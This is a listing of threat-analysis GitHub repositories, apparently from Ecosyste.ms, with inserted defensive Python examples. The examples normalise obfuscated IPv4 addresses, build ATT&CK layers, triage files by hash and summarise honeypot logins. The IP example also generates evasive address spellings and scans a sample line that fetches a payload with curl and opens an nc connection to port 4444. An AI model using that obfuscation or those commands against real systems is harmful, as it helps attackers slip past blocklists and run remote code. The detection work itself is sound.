Ecosyste.ms: Repos
An open API service providing repository metadata for many open source software ecosystems.
GitHub topics: threat-analysis
deepfence/ThreatMapper
Open source cloud native security observability platform. Linux, K8s, AWS Fargate and more.
Language: TypeScript - Size: 215 MB - Last synced: 23 days ago - Pushed: 23 days ago - Stars: 4,630 - Forks: 566
InQuest/ThreatIngestor
Extract and aggregate threat intelligence.
Language: Python - Size: 1.65 MB - Last synced: 1 day ago - Pushed: 3 months ago - Stars: 790 - Forks: 133
ecstatic-nobel/OSweep
Don't Just Search OSINT. Sweep It.
Language: Python - Size: 43.5 MB - Last synced: 1 day ago - Pushed: over 3 years ago - Stars: 303 - Forks: 70
tatsuiman/malware-traffic-analysis.net
Download pcap files from http://www.malware-traffic-analysis.net/
Size: 912 MB - Last synced: 1 day ago - Pushed: over 6 years ago - Stars: 69 - Forks: 21
t4d/PhishingKitHunter
Find phishing kits which use your brand/organization's files and images.
Language: Python - Size: 29.3 KB - Last synced: 17 days ago - Pushed: over 5 years ago - Stars: 221 - Forks: 64
cowrie/cowrie
Cowrie SSH/Telnet Honeypot https://cowrie.readthedocs.io
Language: Python - Size: 9.49 MB - Last synced: 27 days ago - Pushed: 29 days ago - Stars: 4,903 - Forks: 846
mishalhossin/DetectXDiscord
This Discord bot is designed to provide file scanning functionality using the VirusTotal API to check for viruses and other malware in attachments uploaded to a Discord channel.
Language: Python - Size: 36.1 KB - Last synced: 17 days ago - Pushed: 12 months ago - Stars: 5 - Forks: 1
CYB3RMX/Qu1cksc0pe
All-in-One malware analysis tool.
Language: YARA - Size: 107 MB - Last synced: about 1 month ago - Pushed: about 1 month ago - Stars: 1,096 - Forks: 163
MISP/MISP
MISP (core software) - Open Source Threat Intelligence and Sharing Platform
Language: PHP - Size: 136 MB - Last synced: about 1 month ago - Pushed: about 1 month ago - Stars: 4,963 - Forks: 1,335
zdhenard42/SOC-Multitool
A powerful and user-friendly browser extension that streamlines investigations for security professionals.
Language: JavaScript - Size: 35.2 KB - Last synced: about 1 month ago - Pushed: 9 months ago - Stars: 308 - Forks: 41
Graylog2/graylog-plugin-threatintel
Graylog Processing Pipeline functions to enrich log messages with IoC information from threat intelligence databases
Language: Java - Size: 1.68 MB - Last synced: 30 days ago - Pushed: 2 months ago - Stars: 145 - Forks: 21
MISP/misp-decaying-models
MISP decaying models
Language: Shell - Size: 7.81 KB - Last synced: about 2 months ago - Pushed: almost 4 years ago - Stars: 9 - Forks: 4
barleybobs/DisTrace
Distrace is a collection of python scripts that are designed to assist in tracking, analysing, and disrupting malware campaigns that utilise Discord for command & control (C2).
Language: Python - Size: 17.6 KB - Last synced: about 2 months ago - Pushed: about 2 months ago - Stars: 2 - Forks: 0
ethansilvas/google-cybersecurity
Projects, notes, and write-ups I have done while completing the Google Cybersecurity Certificate
Language: Jupyter Notebook - Size: 5.13 MB - Last synced: about 2 months ago - Pushed: 7 months ago - Stars: 29 - Forks: 14
AppThreat/threat-db
A graph database for components, vulnerabilities and threats powered by dgraph
Language: Python - Size: 1.26 MB - Last synced: 17 days ago - Pushed: over 1 year ago - Stars: 5 - Forks: 1
CERTCC/Vulnerability-Data-Archive
With the hope that someone finds the data useful, we periodically publish an archive of almost all of the non-sensitive vulnerability information in our vulnerability reports database. See also https://github.com/CERTCC/Vulnerability-Data-Archive-Tools
Size: 70.2 MB - Last synced: 2 months ago - Pushed: almost 4 years ago - Stars: 82 - Forks: 25
reportsmishing/public_code
Bunch of scripts helping to investigate smishing URLs
Language: Python - Size: 9.77 KB - Last synced: 14 days ago - Pushed: 11 months ago - Stars: 1 - Forks: 0
reportsmishing/knowledgebase
Size: 1.41 MB - Last synced: 14 days ago - Pushed: 8 months ago - Stars: 3 - Forks: 0
ethansilvas/security-plus
Notes and practice exam analysis I completed when preparing for my CompTIA Security+ exam
Size: 272 MB - Last synced: about 2 months ago - Pushed: 6 months ago - Stars: 3 - Forks: 0
satan1a/TheRoadOfSO
Notes from learning security operations | The knowledge base of security operation
Language: HTML - Size: 21.8 MB - Last synced: 2 months ago - Pushed: 9 months ago - Stars: 588 - Forks: 133
CloudDefenseAI/falco_extended_rules
Curating Falco rules with MITRE ATT&CK Matrix
Language: Python - Size: 102 KB - Last synced: 3 months ago - Pushed: 3 months ago - Stars: 62 - Forks: 9
ion-storm/sysmon-config Fork of SwiftOnSecurity/sysmon-config
Advanced Sysmon ATT&CK configuration focusing on Detecting the Most Techniques per Data source in MITRE ATT&CK, Provide Visibility into Forensic Artifact Events for UEBA, Detect Exploitation events with wide CVE Coverage, and Risk Scoring of CVE, UEBA, Forensic, and MITRE ATT&CK Events.
Language: PowerShell - Size: 1.56 MB - Last synced: 3 months ago - Pushed: 6 months ago - Stars: 741 - Forks: 142
TalEliyahu/Threat_Model_Examples
Collection of Threat Models
Size: 70.3 KB - Last synced: 4 months ago - Pushed: almost 2 years ago - Stars: 333 - Forks: 49
curated-intel/Threat-Actor-Profile-Guide
The Threat Actor Profile Guide for CTI Analysts
Size: 645 KB - Last synced: 4 months ago - Pushed: 10 months ago - Stars: 79 - Forks: 11
alvin-tosh/Infosec-and-Hacking-Scripts
🚀 This is a collection of hacking🔥 and pentesting 🧐 scripts to help with enumeration, OSINT, exploitation and post-exploitation: automated scripts to make hacking easier🌠. Have fun!😎
Language: Python - Size: 9.76 MB - Last synced: 4 months ago - Pushed: 4 months ago - Stars: 117 - Forks: 38
bobby-tablez/IP-Obfuscator
Hide an IP address in scripts using hex/decimal/octal conversions
Language: PowerShell - Size: 185 KB - Last synced: 5 months ago - Pushed: 5 months ago - Stars: 51 - Forks: 9
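The trick IP-Obfuscator relies on is that inet_aton-style parsers (libc, most URL libraries, many socket APIs) accept an IPv4 address as a single 32-bit decimal or hex integer, as octal octets, or with fewer than four dotted parts. The defensive counterpart is to canonicalise every spelling before comparing it against a blocklist. The following is an added example written for this listing, not the repository's own PowerShell code; it produces the alternate spellings of an address, folds any of them back to dotted-quad with the same precedence rules as inet_aton(), and scans script text for literals that resolve to an address (the "ignore bare integers below 2**24" rule in the scanner is an assumption made to suppress ordinary numbers).

```python
from __future__ import annotations

import ipaddress
import re

# Added example (not the IP-Obfuscator repo's own code). Shows the alternate
# IPv4 spellings inet_aton-style parsers accept, and a normaliser that maps
# them back to dotted-quad so detections and allow/deny lists can compare them.

_HEX = re.compile(r"0[xX][0-9a-fA-F]+")
_OCT = re.compile(r"0[0-7]*")
_DEC = re.compile(r"[1-9][0-9]*|0")
# A candidate literal: 1-4 components, each decimal or 0x-hex, not glued to a word.
_TOKEN = re.compile(
    r"(?<![\w.])(?:0[xX][0-9a-fA-F]+|[0-9]+)(?:\.(?:0[xX][0-9a-fA-F]+|[0-9]+)){0,3}(?![\w.])"
)


def obfuscate_ipv4(ip: str) -> dict:
    """Return equivalent spellings of a dotted-quad IPv4 address."""
    octets = [int(o) for o in ip.split(".")]
    if len(octets) != 4 or any(not 0 <= o <= 255 for o in octets):
        raise ValueError(f"not a dotted-quad IPv4 address: {ip!r}")
    as_int = int.from_bytes(bytes(octets), "big")
    return {
        "dotted": ip,
        "decimal": str(as_int),                          # one 32-bit integer
        "hex": f"0x{as_int:08x}",                        # one 32-bit hex literal
        "octal": ".".join(f"0{o:o}" for o in octets),    # leading 0 means octal
        "dotted_hex": ".".join(f"0x{o:02x}" for o in octets),
        "short": f"{octets[0]}.{as_int & 0xFFFFFF}",     # a.b form: b fills 24 bits
    }


def _parse_part(part: str) -> int:
    # Same precedence as the C library's inet_aton(): 0x prefix is hex,
    # a leading 0 is octal, anything else is decimal. "08" is rejected.
    if _HEX.fullmatch(part):
        return int(part, 16)
    if _OCT.fullmatch(part):
        return int(part, 8)
    if _DEC.fullmatch(part):
        return int(part, 10)
    raise ValueError(f"bad address component {part!r}")


def normalize_ipv4(text: str) -> str:
    """Canonicalise any inet_aton-style spelling to dotted-quad."""
    parts = text.strip().split(".")
    if not 1 <= len(parts) <= 4:
        raise ValueError(f"too many components in {text!r}")
    values = [_parse_part(p) for p in parts]
    # With fewer than four parts the last one fills the remaining bytes.
    widths = [8] * (len(values) - 1) + [8 * (5 - len(values))]
    as_int = 0
    for value, width in zip(values, widths):
        if value >= 1 << width:
            raise ValueError(f"component {value} does not fit in {width} bits")
        as_int = (as_int << width) | value
    return str(ipaddress.IPv4Address(as_int))


def find_ipv4_literals(script: str) -> list[tuple[str, str]]:
    """Find tokens in script text that parse as IPv4; return (token, canonical).

    Assumption for this example: a bare integer (no dots) is only reported when
    its first octet is non-zero, i.e. it is at least 2**24, so ordinary numbers
    in a script are not flagged.
    """
    found = []
    for match in _TOKEN.finditer(script):
        token = match.group(0)
        try:
            canonical = normalize_ipv4(token)
        except ValueError:
            continue
        if "." not in token and int(canonical.split(".")[0]) == 0:
            continue
        found.append((token, canonical))
    return found


if __name__ == "__main__":
    for form, value in obfuscate_ipv4("192.168.1.1").items():
        print(f"{form:>10}: {value:<22} -> {normalize_ipv4(value)}")
    print(find_ipv4_literals('curl http://0xc0a80101/payload; sleep 42; nc 3232235777 4444'))
```

Note that Python's own ipaddress.ip_address() rejects leading zeros and integer forms when given a string, which is exactly why a blocklist lookup keyed on the raw string misses these; normalising first and comparing the canonical form closes that gap.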
markmackensen/attack_layer_builder
A Python script to generate MITRE ATT&CK Navigator layers from TTPs
Language: Python - Size: 593 KB - Last synced: about 1 month ago - Pushed: about 1 month ago - Stars: 1 - Forks: 0
R4GN4R0K-SEC/R4GN4R0K-SEC.github.io
RAGNAR0K-SEC | Offensive CyberSec | CyberHacktivism | PenTesting | OSINT | lulz
Size: 12.7 KB - Last synced: 6 months ago - Pushed: 6 months ago - Stars: 0 - Forks: 0
markmackensen/ATTACK-Layer-Builder
A Python script to generate MITRE ATT&CK Navigator layers from TTPs
Language: Python - Size: 493 KB - Last synced: 6 months ago - Pushed: 6 months ago - Stars: 1 - Forks: 0
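Both of markmackensen's repositories above produce ATT&CK Navigator layers from a list of TTPs. The layer format is plain JSON: a list of technique objects keyed by techniqueID, each with an optional score that the gradient colours. The following is an added example for this listing, not either repository's code: it takes (technique ID, source) pairs such as those extracted from intel reports, scores each technique by how many sources reported it, and inserts the parent of every reported sub-technique so Navigator expands it. The "versions" numbers are assumptions; set them to the Navigator and ATT&CK releases you actually load the layer into.

```python
import json
import re
from collections import Counter, defaultdict

# Added example (not the attack_layer_builder / ATTACK-Layer-Builder code).
# Builds an ATT&CK Navigator layer dict from (technique_id, source) pairs.

_TECHNIQUE_ID = re.compile(r"^T\d{4}(?:\.\d{3})?$")


def build_layer(name, ttps, domain="enterprise-attack"):
    """Return a Navigator layer for ttps = [(technique_id, source), ...].

    score = number of observations of the technique; comment lists the sources.
    """
    ttps = list(ttps)
    scores = Counter()
    sources = defaultdict(set)
    for technique_id, source in ttps:
        if not _TECHNIQUE_ID.match(technique_id):
            raise ValueError(f"not an ATT&CK technique ID: {technique_id!r}")
        scores[technique_id] += 1
        sources[technique_id].add(source)

    entries = {}
    for technique_id in scores:
        entries[technique_id] = {
            "techniqueID": technique_id,
            "score": scores[technique_id],
            "comment": "reported by: " + ", ".join(sorted(sources[technique_id])),
            "enabled": True,
        }
    # Every reported sub-technique needs its parent present with
    # showSubtechniques set, otherwise Navigator keeps the row collapsed.
    for technique_id in list(scores):
        if "." in technique_id:
            parent = technique_id.split(".")[0]
            entry = entries.setdefault(parent, {"techniqueID": parent, "enabled": True})
            entry["showSubtechniques"] = True

    max_score = max(scores.values(), default=0)
    return {
        "name": name,
        "versions": {"attack": "14", "navigator": "4.9", "layer": "4.5"},  # assumed
        "domain": domain,
        "description": f"{len(scores)} techniques from {len(ttps)} observations",
        "techniques": [entries[k] for k in sorted(entries)],
        "gradient": {"colors": ["#ffffff", "#ff6666"], "minValue": 0, "maxValue": max_score},
    }


def layer_json(name, ttps):
    """Serialised form ready to save as a .json file and open in Navigator."""
    return json.dumps(build_layer(name, ttps), indent=2)


if __name__ == "__main__":
    # Constructed sample: two reports, one technique seen in both.
    sample = [
        ("T1566.001", "report-a"),
        ("T1059.001", "report-a"),
        ("T1059.001", "report-b"),
        ("T1486", "report-b"),
    ]
    print(layer_json("Sample overlap layer", sample))
```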
ecstatic-nobel/Analyst-Arsenal 📦
A toolkit for Security Researchers
Language: Python - Size: 5.86 MB - Last synced: 6 months ago - Pushed: over 4 years ago - Stars: 120 - Forks: 36
Daethyra/OpenDTS 📦
Open Domestic Threat Scanner - LLM Threat-Intelligence
Language: Python - Size: 60 MB - Last synced: 17 days ago - Pushed: 9 months ago - Stars: 2 - Forks: 0
401trg/detections
This repository contains all public indicators identified by 401trg during the course of our investigations. It also includes relevant YARA rules and IDS signatures to detect these indicators.
Language: Python - Size: 4.37 MB - Last synced: 6 months ago - Pushed: about 3 years ago - Stars: 120 - Forks: 19
izm1chael/threatnote Fork of brianwarehime/threatnote
threatnote | Cyber Threat Intelligence Notebook
Language: JavaScript - Size: 13.3 MB - Last synced: 7 months ago - Pushed: 7 months ago - Stars: 0 - Forks: 0
vrikodar/DiaLog
DiaLog is a powerful log file analyzer that can also do passive analysis of malicious IPs found in web-server traffic
Language: Python - Size: 4.44 MB - Last synced: 7 months ago - Pushed: over 2 years ago - Stars: 5 - Forks: 0
danieleperera/SocAnalystArsenal 📦
Quick SOC L1 ticket structure
Language: Python - Size: 4.52 MB - Last synced: 7 months ago - Pushed: almost 5 years ago - Stars: 30 - Forks: 13
ancailliau/SynSharp
A C# client for Vertex Synapse
Language: C# - Size: 282 KB - Last synced: 17 days ago - Pushed: 6 months ago - Stars: 2 - Forks: 1
jamesbower/EngagedThreat
The goal of Engaged Threat is to provide honeypot researchers the ability to hold the attention of an attacker or to induce the attacker to participate in some sort of increased activity.
Language: Shell - Size: 11.7 KB - Last synced: 4 months ago - Pushed: about 5 years ago - Stars: 7 - Forks: 1
MojtabaTajik/SecureBox
Safe virtual drive which prevents threats from being executed
Language: C# - Size: 206 KB - Last synced: 9 months ago - Pushed: 9 months ago - Stars: 3 - Forks: 2
jackaduma/ThreatReportExtractor
Extracting Attack Behavior from Threat Reports
Language: Python - Size: 21.6 MB - Last synced: 10 months ago - Pushed: about 1 year ago - Stars: 53 - Forks: 13
jackaduma/SecBERT
pretrained BERT model for cyber security text, learned CyberSecurity Knowledge
Language: Python - Size: 490 KB - Last synced: 10 months ago - Pushed: about 1 year ago - Stars: 81 - Forks: 17
cyph3rryx/CyberThreat-Monitor
CyberThreat Monitor (SIEM Lab) with Microsoft Azure is a comprehensive threat monitoring solution built on Azure Sentinel, providing real-time visibility into global cyber threats.
Language: PowerShell - Size: 1.41 MB - Last synced: 7 months ago - Pushed: 7 months ago - Stars: 1 - Forks: 0
0xElshazly/0xElshazly.github.io
Threat Analyst - Incident Response - Digital Forensics - Malware Analysis - Blue Team ~ Blog
Language: JavaScript - Size: 53.3 MB - Last synced: 8 months ago - Pushed: 8 months ago - Stars: 1 - Forks: 0
techathena/veritas
pcap analyser that uses a REST API for IP/URL reputation and also for obtaining URLs
Language: Python - Size: 8.44 MB - Last synced: about 2 months ago - Pushed: over 3 years ago - Stars: 2 - Forks: 0
secnnet/AMSI-Scripts
Language: PowerShell - Size: 9.77 KB - Last synced: 7 months ago - Pushed: 7 months ago - Stars: 0 - Forks: 0
sebdufourcq/SOC-Multitool-for-Firefox
A powerful and user-friendly browser extension that streamlines investigations for security professionals.
Language: JavaScript - Size: 12.7 KB - Last synced: 10 months ago - Pushed: 10 months ago - Stars: 0 - Forks: 0
blockboard/ThreatMapper Fork of deepfence/ThreatMapper
Identify vulnerabilities in running containers, images, hosts and repositories
Size: 9.84 MB - Last synced: 10 months ago - Pushed: almost 4 years ago - Stars: 2 - Forks: 2
dc401/py-vthashcheck
A proof of concept AWS Lambda Python 3.7 runtime that takes Amazon S3 objects, evaluates them against file magic MIME types, and checks existing SHA256 hashes or uploads the file to VirusTotal using an API key. The API key is retrieved from AWS Secrets Manager, a security best practice, and cached to reduce API overhead.
Language: Python - Size: 13.1 MB - Last synced: 23 days ago - Pushed: about 1 year ago - Stars: 1 - Forks: 0
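The order of operations in that Lambda matters more than the cloud plumbing: sniff the real type from the bytes rather than the object key, hash the object, consult hashes you already know, and only then decide whether the file should leave your account. A hash lookup against VirusTotal discloses nothing, whereas an upload shares the whole file with every subscriber, so the upload branch needs a disclosure decision, not just an API call. The following is an added example for this listing, not the py-vthashcheck code; it performs that triage entirely offline. The magic-byte table, the set of types worth scanning and the sample objects are constructed for the example, and the real S3, Secrets Manager and VirusTotal calls are left out.

```python
import hashlib

# Added example (not the py-vthashcheck repo's own code). Offline triage of an
# object: type by magic bytes, SHA256, known-hash check, then an upload decision.

# (magic bytes at offset 0, label); first match wins. Constructed for the example.
_MAGIC = [
    (b"MZ", "application/x-dosexec"),                                  # PE / DOS
    (b"\x7fELF", "application/x-executable"),
    (b"%PDF-", "application/pdf"),
    (b"PK\x03\x04", "application/zip"),                                # also docx/jar/apk
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "application/x-ole-storage"),  # legacy Office
    (b"#!", "text/x-script"),
]
# Types worth a reputation check; anything else is skipped (assumed policy).
SCAN_TYPES = {label for _, label in _MAGIC}


def sniff_type(data: bytes) -> str:
    """Classify by leading bytes; never trust the object key's extension."""
    for magic, label in _MAGIC:
        if data.startswith(magic):
            return label
    return "application/octet-stream"


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def triage(data: bytes, known_malicious: set, known_clean: set) -> dict:
    """Decide what to do with an object without sending its bytes anywhere."""
    digest = sha256_hex(data)
    kind = sniff_type(data)
    if kind not in SCAN_TYPES:
        action = "skip"                   # not an executable or document type
    elif digest in known_malicious:
        action = "quarantine"             # hash already known bad; no lookup needed
    elif digest in known_clean:
        action = "allow"
    else:
        # Unknown hash. A VirusTotal hash lookup (GET /files/{sha256}) leaks
        # nothing; uploading the bytes discloses the file to all subscribers,
        # so that step belongs behind a per-bucket disclosure policy.
        action = "lookup-then-upload"
    return {"sha256": digest, "type": kind, "action": action}


# Constructed sample objects (not real malware): a PE-looking header, a PDF
# header and a plain text file.
SAMPLE_PE = b"MZ\x90\x00" + b"\x00" * 60
SAMPLE_PDF = b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n"
SAMPLE_TXT = b"hello, world\n"


if __name__ == "__main__":
    known_bad = {sha256_hex(SAMPLE_PE)}  # pretend a prior verdict exists
    for name, blob in (("pe", SAMPLE_PE), ("pdf", SAMPLE_PDF), ("txt", SAMPLE_TXT)):
        print(name, triage(blob, known_bad, set()))
```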
scriptingislife/insight
Insight aids in profiling a host by searching several online services for information about an IP or domain name.
Language: Python - Size: 318 KB - Last synced: 11 months ago - Pushed: over 2 years ago - Stars: 3 - Forks: 0
scriptingislife/Mapper-Server
Map and visualize SSH logins from sensors.
Language: Python - Size: 86.9 KB - Last synced: 11 months ago - Pushed: almost 6 years ago - Stars: 3 - Forks: 2
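Mapper-Server consumes SSH login events from sensors such as the cowrie honeypot listed earlier on this page. Before anything is mapped, the events have to be parsed and aggregated: which sources hit which sensor, which credentials are being sprayed, and which sessions the honeypot let in (those are the ones that go on to run commands). The following is an added example for this listing, not code from cowrie or Mapper-Server. The field names follow cowrie's JSON log output (eventid, src_ip, username, password, sensor, timestamp, session); the log lines themselves are constructed sample data, and the malformed line is there to show that one bad line must not abort the batch.

```python
import json
from collections import Counter, defaultdict

# Added example (not cowrie's or Mapper-Server's code). Aggregates credential
# attempts per sensor and source from cowrie-style JSON log lines.

# Constructed sample log; field names follow cowrie's JSON output.
SAMPLE_LOG = """\
{"eventid":"cowrie.session.connect","src_ip":"203.0.113.10","sensor":"hp-eu-1","timestamp":"2024-05-01T10:00:00Z","session":"a1"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","src_ip":"203.0.113.10","sensor":"hp-eu-1","timestamp":"2024-05-01T10:00:01Z","session":"a1"}
{"eventid":"cowrie.login.failed","username":"root","password":"admin","src_ip":"203.0.113.10","sensor":"hp-eu-1","timestamp":"2024-05-01T10:00:02Z","session":"a1"}
{"eventid":"cowrie.login.success","username":"root","password":"toor","src_ip":"203.0.113.10","sensor":"hp-eu-1","timestamp":"2024-05-01T10:00:03Z","session":"a1"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","src_ip":"198.51.100.7","sensor":"hp-us-1","timestamp":"2024-05-01T10:05:00Z","session":"b2"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","src_ip":"198.51.100.7","sensor":"hp-us-1","timestamp":"2024-05-01T10:05:01Z","session":"b2"}
not json at all
{"eventid":"cowrie.command.input","input":"uname -a","src_ip":"203.0.113.10","sensor":"hp-eu-1","timestamp":"2024-05-01T10:00:04Z","session":"a1"}
"""

LOGIN_EVENTS = {"cowrie.login.failed", "cowrie.login.success"}


def parse_events(text):
    """Yield JSON event dicts, skipping blank or unparseable lines."""
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # a corrupt line should not abort the whole batch
        if isinstance(event, dict) and "eventid" in event:
            yield event


def summarize_logins(text, top_n=5):
    """Per-sensor source counts, most-sprayed credentials, and accepted logins."""
    per_sensor = defaultdict(Counter)
    credentials = Counter()
    successes = []
    for ev in parse_events(text):
        if ev["eventid"] not in LOGIN_EVENTS:
            continue
        sensor = ev.get("sensor", "unknown")
        src_ip = ev.get("src_ip", "?")
        per_sensor[sensor][src_ip] += 1
        credentials[(ev.get("username", ""), ev.get("password", ""))] += 1
        if ev["eventid"] == "cowrie.login.success":
            # The honeypot accepted the credentials; this session will carry
            # the attacker's commands and is the one worth mapping first.
            successes.append((sensor, src_ip, ev.get("username", ""),
                              ev.get("password", ""), ev.get("timestamp", "")))
    return {
        "per_sensor": {s: dict(c) for s, c in per_sensor.items()},
        "top_credentials": credentials.most_common(top_n),
        "successes": successes,
    }


if __name__ == "__main__":
    summary = summarize_logins(SAMPLE_LOG)
    for sensor, sources in summary["per_sensor"].items():
        print(sensor, sources)
    print("top credentials:", summary["top_credentials"])
    print("accepted logins:", summary["successes"])
```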
JacYuan1/Malware-Analysis-Project
Analyze different types of malware with the use of static and dynamic analysis techniques.
Size: 2.87 MB - Last synced: about 1 year ago - Pushed: about 1 year ago - Stars: 1 - Forks: 0
wisepythagoras/honeyshell
An SSH honeypot written entirely in Go.
Language: Go - Size: 154 KB - Last synced: about 2 months ago - Pushed: 3 months ago - Stars: 7 - Forks: 1
Truvis/Suricata_Threat-Hunting-Rules
Collection of Suricata rule sets that I use modified to my environments.
Size: 23.4 KB - Last synced: 12 months ago - Pushed: over 3 years ago - Stars: 27 - Forks: 9
jh00nbr/Phishruffus
Intelligent threat hunter and phishing servers
Language: Python - Size: 8.79 KB - Last synced: about 1 year ago - Pushed: over 5 years ago - Stars: 43 - Forks: 25
Avengers7/ThreatExchange
A threat exchange platform
Language: Python - Size: 4.88 MB - Last synced: about 1 year ago - Pushed: over 3 years ago - Stars: 4 - Forks: 0
security-union/going-fishing-with-my-raspberry-pi
Size: 1.04 MB - Last synced: about 1 year ago - Pushed: over 3 years ago - Stars: 21 - Forks: 5
ecstatic-nobel/IOC-Report 📦
Generate a report containing IOCs gathered from VirusTotal and Hybrid-Analysis.
Language: Python - Size: 114 KB - Last synced: about 1 year ago - Pushed: about 5 years ago - Stars: 3 - Forks: 4
paulveillard/cybersecurity-threat-detection
An ongoing & curated collection of awesome software best practices and remediation techniques, libraries and frameworks, E-books and videos, Technical guidelines and important resources about Threat Detection & Hunting.
Size: 138 KB - Last synced: about 1 year ago - Pushed: over 1 year ago - Stars: 22 - Forks: 4
trickest/packages
Automated compromise detection of the world's most popular packages
Size: 5.27 MB - Last synced: about 1 year ago - Pushed: over 1 year ago - Stars: 10 - Forks: 2
katahiromz/AmsiScanner
Threat detector for Windows 10
Language: C++ - Size: 58.6 KB - Last synced: 13 days ago - Pushed: about 5 years ago - Stars: 3 - Forks: 1
AzAgarampur/PsForge
Process Hollowing demonstration & explanation
Language: C++ - Size: 382 KB - Last synced: about 1 year ago - Pushed: about 3 years ago - Stars: 25 - Forks: 7
CYB3RMX/C2Data
A database for captured data (malicious files etc.) from command and control servers.
Size: 3.91 KB - Last synced: about 1 year ago - Pushed: over 1 year ago - Stars: 3 - Forks: 0
tsumarios/AMAYARA-Lab
The アマヤラ Lab project provides a ready-to-use Jupyter Lab environment to help out with Android malware analysis using YARA rules.
Language: Jupyter Notebook - Size: 46.9 KB - Last synced: 10 months ago - Pushed: over 1 year ago - Stars: 1 - Forks: 0
xakepnz/STRIKEWRITER
Looks up details on a public IPv4 address against IP-info and blacklist-search sites, providing a reputation check.
Language: Python - Size: 53.7 KB - Last synced: about 1 year ago - Pushed: over 2 years ago - Stars: 11 - Forks: 3
aishee/Yukio
Script to auto-generate rules from IOCs
Language: Python - Size: 6.84 KB - Last synced: about 1 year ago - Pushed: over 5 years ago - Stars: 2 - Forks: 0
ranguli/ip
ip: (the) i(nternet is) p(robably down)
Language: Python - Size: 4.67 MB - Last synced: about 1 year ago - Pushed: over 1 year ago - Stars: 5 - Forks: 1
alan-analytics/kingstonThreatStudy
Repository for the Kingston University threat study
Language: R - Size: 8.31 MB - Last synced: 8 months ago - Pushed: over 1 year ago - Stars: 1 - Forks: 0
ytisf/Maltego-OTX-Pulses
A set of transformations for indicators and pulses
Language: Python - Size: 22.5 KB - Last synced: 13 days ago - Pushed: over 4 years ago - Stars: 1 - Forks: 1
west-wind/abuse-insights
Extracts the usernames attempted by a compromised host, as reported in AbuseIPDB report comments.
Language: Python - Size: 13.7 KB - Last synced: 7 months ago - Pushed: about 2 years ago - Stars: 1 - Forks: 0
Heimdall-Framework/heimdall-framework
USB threat evaluation framework for Linux
Language: Python - Size: 5.36 MB - Last synced: about 1 year ago - Pushed: over 2 years ago - Stars: 11 - Forks: 0
plushed/threatcalc
Calculate threat levels based on Capability, Opportunity, Intent ratings
Language: Python - Size: 18.8 MB - Last synced: about 1 year ago - Pushed: almost 4 years ago - Stars: 0 - Forks: 0
Heimdall-Framework/heimdall-paper
Size: 1.81 MB - Last synced: about 1 year ago - Pushed: about 4 years ago - Stars: 0 - Forks: 0
Piuliss/manati-docker
This repository contains the Dockerfile of the project ManaTI https://github.com/stratosphereips/Manati
Language: Shell - Size: 5.86 KB - Last synced: about 1 year ago - Pushed: about 6 years ago - Stars: 3 - Forks: 1
ecstatic-nobel/Google-Indicator-Search
Programmatically find relationships between a list of strings using Google.
Language: Python - Size: 5.86 KB - Last synced: about 1 year ago - Pushed: over 4 years ago - Stars: 2 - Forks: 1
MonoidalAttackTrees/Lina
A Haskell EDSL for conducting threat analysis using Attack Trees
Language: Haskell - Size: 75.2 KB - Last synced: about 1 year ago - Pushed: over 5 years ago - Stars: 3 - Forks: 1
jamieres/mz-data-extract
Simple tool you can use to collect relevant data from Portable Executable (PE) files, for use as intel during a line of research related to malware.
Language: Python - Size: 657 KB - Last synced: about 1 year ago - Pushed: almost 7 years ago - Stars: 1 - Forks: 2